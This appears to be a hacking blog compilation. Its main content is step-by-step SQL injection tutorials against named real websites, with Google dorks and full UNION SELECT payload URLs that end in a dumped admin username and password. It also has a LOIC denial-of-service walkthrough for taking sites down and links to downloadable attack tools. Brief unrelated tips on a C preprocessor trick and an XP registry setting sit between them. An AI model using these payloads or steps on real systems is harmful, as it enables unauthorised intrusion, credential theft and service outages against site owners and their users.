how to find hackable sites used for sql injection

download the software provided link below:

http://www.ziddu.com/download/9804990/SQLExploitScanner.rar.html

step2:run the software

3. Now, select Google.com from drop down box in "Options" and select "Blackie" radio button. You can choose any radio button. But, Blackie is giving good results as I have noticed.

4. In "Website and Search Engine Dork", select any dork you want. I have selected "article.php?id=".(basically we trying to obtain google dork for more info. consider prvious blog article "sql injection".

5. Now, hit on "Go" and you will see list of websites that are found vulnerable. Thus, you can hack websites mentioned in the list. Hit on "Clean Bad URL's" and then "Exploit URL".

6. SQL Scanner software will then display final list of exploited urls which are found vulnerable. Simply click on any url. I have used

http://www.michaelpollan.com/article.php?id=80%27

and you can see the results.

Click on image to see enlarged view

Thus, since the website is mentioning this error, this website is vulnerable and you can try and hack website.

7.now use above website for hacking by using following software.

download the software provided below:

http://www.ziddu.com/download/9805374/SQLHelper.rar.html

3. Now, when you have website hacking software, you need to find website with potential vulnerability. There are some websites that are unhackable. While finding hackable websites, it is better to search for sites with format "article.php?id=[number]" in url.

Lets consider one example which I will use in this article:

http://encycl.anthropology.ru/article.php?id=1

Check whether your searched victim site can be hacked by entering:

http://encycl.anthropology.ru/article.php?id='1

in address bar and hit enter. You will get error message like:

Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

If you get such error message, it is confirmed that you can hack website using this method and now you can move forward to hack website.

4. Run SQLI Helper on your computer.

5. In target field, enter http://encycl.anthropology.ru/article.php?id=1 (the website url you just discovered as hackable) and hit on "Inject".

6. SQLI Helper will search for columns and you will have something like this:

7. Hit on "Get Database" to get:

8. Select any element from "Database Name" and click on "Get Tables".

9. Now, select element from table and hit on "Get Columns". I have selected "user" to get userid and password required for login.

10. Now, when you know "user" table has columns "usr_login" and "usr_pass", select them and hit on "Dump Now".

11. You will get values like these:

12. The values achieved are actually in hash and hence you have to crack these hashes to get userlogin and password to hack website. For this, go to http://www.md5crack.com/ and crack the hash using "Crack that hash baby" button. Thus, you are now able to hack website as you have got website user id and password. Once, you get admin password, you can easily hack website.

ENJOY HACKING BUT NOT TO HARM OTHERS

Denial of Service DOS Attack:

Denial of Service attack is an attack in which target system clogs up due to numerous and large amount of requests sent to it and is hence unable to serve other users of system. DOS attack helps in increasing packet traffic in networkleading to congestion. DOS attacks often leads target system to crash, reboot or atleast deny service to other users.

STEP : download the software http://fairurl.com/10563

STEP :In URL field, type the website address you want to take down or hack and hit on "Lock On".

STEP :In Attack Options, assign "9001" as Timeout Value.

STEP :Now, simply hit on "IMMA CHARGIN MAH LAZER" to start DOS attack on website. Keep it running to see website down after sometime.

Note: This is DOS attack and will hardly work from single computer or single instance. You can make this attack effective by implemeting Denial of Service attack from multiple computers and running multiple instances of LOIC on each computer.

So friends, I hope you are well acknowledged with Denial of Service attack and how to hack website using DOS attack. If you have any problem in using Low Orbit Ion Cannon software in implementing DOS attack, please mention it in comments.

Enjoy Denial of Service DOS attack to hack website...

C Program Without a Main Function

How to write a C program without a main function?. Is it possible to do that. Yes there can be a C program without a main function. Here’s the code of the program without a main function…

#include
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)

int begin()
{
printf(” hello “);
}

Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function. But how, whats the logic behind it? How can we have a C program working without main?

Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main. But in reality it runs with a hidden main function.

The ‘##‘ operator is called the token pasting or token merging operator. That is we can merge two or more characters with it.

NOTE: A Preprocessor is program which processess the source code before compilation.

Look at the 2nd line of program -

#define decode(s,t,u,m,p,e,d) m##s##u##t

What is the preprocessor doing here. The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut). The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens).

Now look at the third line of the program -

#define begin decode(a,n,i,m,a,t,e)

Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e). According to the macro definition in the previous line the argument must be expanded so that the 4th,1st,3rd & the 2nd characters must be merged. In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,'a’,'i’ & ‘n’.

So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler. That’s it…

The bottom line is there can never exist a C program without a main function. Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exists a hidden main function in the program. Here we are using the proprocessor directive to intelligently replace the word begin” by “main”. In simple words int begin=int main.

Lets see how the preprocessor replaces begin by main..

When preprocessor scans the source code it encounters the word “begin” at the 4th line of the source code.So according to the macro definition in the third line the word “begin” is expanded into decode(a,n,i,m,a,t,e).
But according to the macro definition of the second line decode(a,n,i,m,a,t,e) must be expanded into m##a##i##n (4th,1st,3d 2nd) characters

Hence in the expanded source code(the source code after being processed by preprocessor and passed on to compiler) “begin” is eventually replaced by “main”…

Change the Default Location for Installing Programs

AS you know XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/or directory by using a Registry hack. Run the Registry Editor and go to

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion.

Look for the value named ProgramFilesDir.

By default, the value will be C:\Program Files.

Edit the value to any valid drive or folder;

Now XP will use that new location as the default installation directory for new programs.This registry hack can be very useful when your c drive is full and you automatically want to change the installing directory.Enjoy this cool windows registry hack

SQL INJECTION TO HACK WEBSITE

1. How to check if the website is vulnerable to SQL Injection?
A: On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because, 97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn’t have more than 100 columns at the most in its database. So by entering the number 6753, you are trying to make it sure if the website gives you an error with it. IF it does that means you can proceed further. To check an SQL Injection, its mandatory that the website should be pointing it self to some specific page, i.e. “website.com/index.php?page=11″. So in this case the website is pointing it self to page Number.11 to pull up some specific information. So, to check if the website is vulnerable or not, you can try with the following URL. i.e. “website.com/index.php?page=11+order+by+6753″.

2. How would i find the vulnerable websites?
A.: Google is the best friend of Hackers, when I say this don’t assume that i am just writing it because i am supposed it. I really mean it. There is something called as “google dorks”, which are basically a command which could be put into the Google search to find out specific groups of pages.
here are some Google dorks which you may try to find out the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

This will help you to find out the websites which are connected and working with SQL Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to put“order+by+6753″ at the end of the URL to check if its vulnerable.

Step 1 : Finding Vulnerable Page.

Lets start, as you’ll know the website that i will test today is www.RfidUpdate.com. So lets open up the website in the browser. So just a little information about website, RFID means “radio frequency identification”. So on the right hand side you will see that it gives you an opportunity to subscribe to the website. So now it should give you an idea that when you subscribe to it, there has to be a place where your E-mail address should be saved, so it has to have a database! So, now we know that the website is supported by an SQL Database at the backend. So we are on the right track.

As I have written earlier, in order to perform an SQL Injection we will have to find a page that has “something.php?id=2121″ at the end of the URL, so we will try to find such page on RfidUpdate.com. I have found a page by exploring the website a bit. The URL of the page is,

http://www.rfidupdate.com/articles/index.php?id=1563

So now, we know it has an SQL Database and we have the apge where we can start with.

So lets try to check if the website is vulnerable to SQL Attack, we will try to add“+order+by+6753–” as i have written earlier.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753–

Now, you should have noticed an error, which says :
“Error 1054: Unknown column ‘6753′ in ‘order clause’”

So, It means that the database gave u a message saying “there is no such column”. So error doesn’t really make any difference, but the main thing we should notice is that the database communicated with us directly. So there is a possibility that we can exploit it.

Step 2 : Finding Number of Columns.

Now, the next thing we will try is to find the out many columns do this page have. So now, instead of “6753″, we will start from number 1 then 5 then 15, we will keep doing this unless we get some error. So, try the following url.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1–

The webpage opened up fine, which means that the website has more then 1 column, now try number 5.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5–

Same thing, now try 10.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10–

Still no error, try 15.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15–

Still no error , try 20.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20--

WHOA!, We got the error, which means that the number of columns in the webpage is between 15 to 20. So lets try with number “16″ now.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16–

YAY!, you got the error on number “16″ as well. Which means, that the website has 15 columns. So now lets move further.

Step 3 : Using “Union Select All” Command.

Now, we will try to combine all the columns and we will see what do we get, the command goes as follow:-

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–

FYI:- please notice tha ti have added “-” before 1563.

Now you see some broken things in there, and now you see that the only indipendent number of column you see on the website is “7″. So apperantly that would be the base of the attack. Everything we do now, would be done with the column number “7″.

So we wil ltry to find the some more information about the DATABASE this website is using, so to do this we can replace the column number 7 with “@@version“, without quotes ofcourse. So try this now.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–

This is what you should see now,
“5.0.67-community”

Which means, that the website is using SQL Version > 5. Now, try following URL to move further.

http://www.rfidupdate.com/articles/index.php?id=-

1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0×3a,ru_Admin_pas

sword),8,9,10,11,12,13,14,15+from%20ru_Admin–

What we did is, to replace the columns names with admin_username & admin_password, and call it from ru_Admin column at the end.

VOILA! What you’re looking at right now the “admin” username and the password in following format.

username : password.

admin:admRIvuxHahkQ

FYI: Wherever you see “%20″ in the URL, that means a SPACE in the address bar.

So you have the password now, you can use it the way you want!.

So this the way to perform an SQL Injection attack. You may try your own stuffs with the google dorks i posted in the beginning. Use it the way you want, just keep in mind that if u know 80/100, there are people out there who know 90/100. So better secure your self first, and try these attacks with the permission of the site owners.

Thank you all for reading this tutorial, I am sure it helped. If there are any more questions feel free to revert back to the same post.

Enjoy Ethical hacking